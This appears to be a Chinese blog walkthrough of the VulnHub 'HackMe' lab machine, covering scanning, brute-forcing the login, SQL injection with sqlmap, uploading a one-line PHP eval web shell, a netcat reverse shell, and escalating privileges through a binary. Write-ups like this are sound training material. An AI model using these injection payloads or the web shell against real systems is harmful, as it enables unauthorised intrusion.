HackMe
- 写写打靶记录。
- 靶机地址:https://www.vulnhub.com/entry/hackme-1,330/
信息收集
- 由于将 Kali 与 靶机在 VM 上使用 NAT 连接,所以使用 Kali 去扫描靶机。
- 首先查看 Kali IP 地址:
1 | ┌──(root㉿kali)-[/opt/antsword] |
- 扫描当前网段,发现靶机 IP 地址:
1 | ┌──(root㉿kali)-[/opt/antsword] |
- 扫描开放端口:
1 | ┌──(root㉿kali)-[/opt/antsword] |
- 扫描端口对应服务:
1 | ┌──(root㉿kali)-[/opt/antsword] |
- 扫描出 80 端口的 Web 服务,通常情况下不考虑 SSH 爆破,访问一下 Web 服务:

暴力破解
一个登陆框,通常来讲,现在有三种方式:
SQL注入 - 万能密码
弱口令 - admin/123456
BurpSuite - 暴力破解
注册一个账户进行测试,试一试万能密码:
1 | ' or 1 = 1 # |
- 很明显不行,但是发现一个逻辑漏洞:

- 当账户不对时,会出现账号不存在,那就可以先找出账户。
- 那就试一试账号:
1 | admin |

- 发现使用test测试时,出现错误的登录认证,说明 test 账户存在。
- 那再试一试密码:
1 | 123456 |
- 简单测了一下都不行,BurpSuite 开跑:


- 选中密码部分,加载自带的密码字典,开始跑:

- 选择报文长度排序,发现很多都可以,灰常奇怪,管他呢,经过尝试都能登录,成功进入后台:

SQL 注入
- 发现一个搜书的模块,点下 search 试试:

- 确实是搜书,这是这个框有可能出现 SQL 注入,手工测一测(firefox的hack有bug):
1 | Linux OS # 正常,注意直接复制 Book Title 后面是跟着一个空格的,等会注入会有问题,而且 Title 必须打全 |


- 手工注入一下:
1 | search=Linux OS' order by 3 # - 正常 |
- 能手工注出来,SQLmap跑一下:
1 | sqlmap -r url.txt -p search --batch |


- 管理员密码没跑出来,去网站解密一下:

文件上传
- 得出密码是 Uncrackable,那 superadmin/Uncrackable 去登录一下:

- 写个马上传一下:
1 | eval($_POST[v]); |

- 发现文件上传成功了,并给出提示在 uploads 目录下,访问一下:

- 成功访问到了~
目录扫描
- 这里如果没看见提示的话,可以使用工具扫一扫后台
- 使用 feroxbuster 扫一扫:
1 | feroxbuster -u http://192.168.1.140 |

- 访问一下,发现还存在有目录遍历漏洞:

- 使用 AntSword 连接一下:

- 连接成功!
NC 反弹
- 由于 AntSword 自带的 Shell 不太友好,使用 NC 反弹一个出来:
1 | AntSword 上 |

- 成功反弹!
文件提权
- 发现权限过低,找找提权:
1 | www-data@hackme:/var/www/html/uploads$ cat /etc/passwd | grep /bin/bash |
- 发现一个 hackme 用户,去家目录下看看:
1 | www-data@hackme:/home$ ls |
- 发现 hackme 的家目录下没东西,但是又发现一个 legacy 目录,再去看看:

- 发现一个有执行权限的二进制文件,运行一下:

- 提权成功!
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Yongz丶!










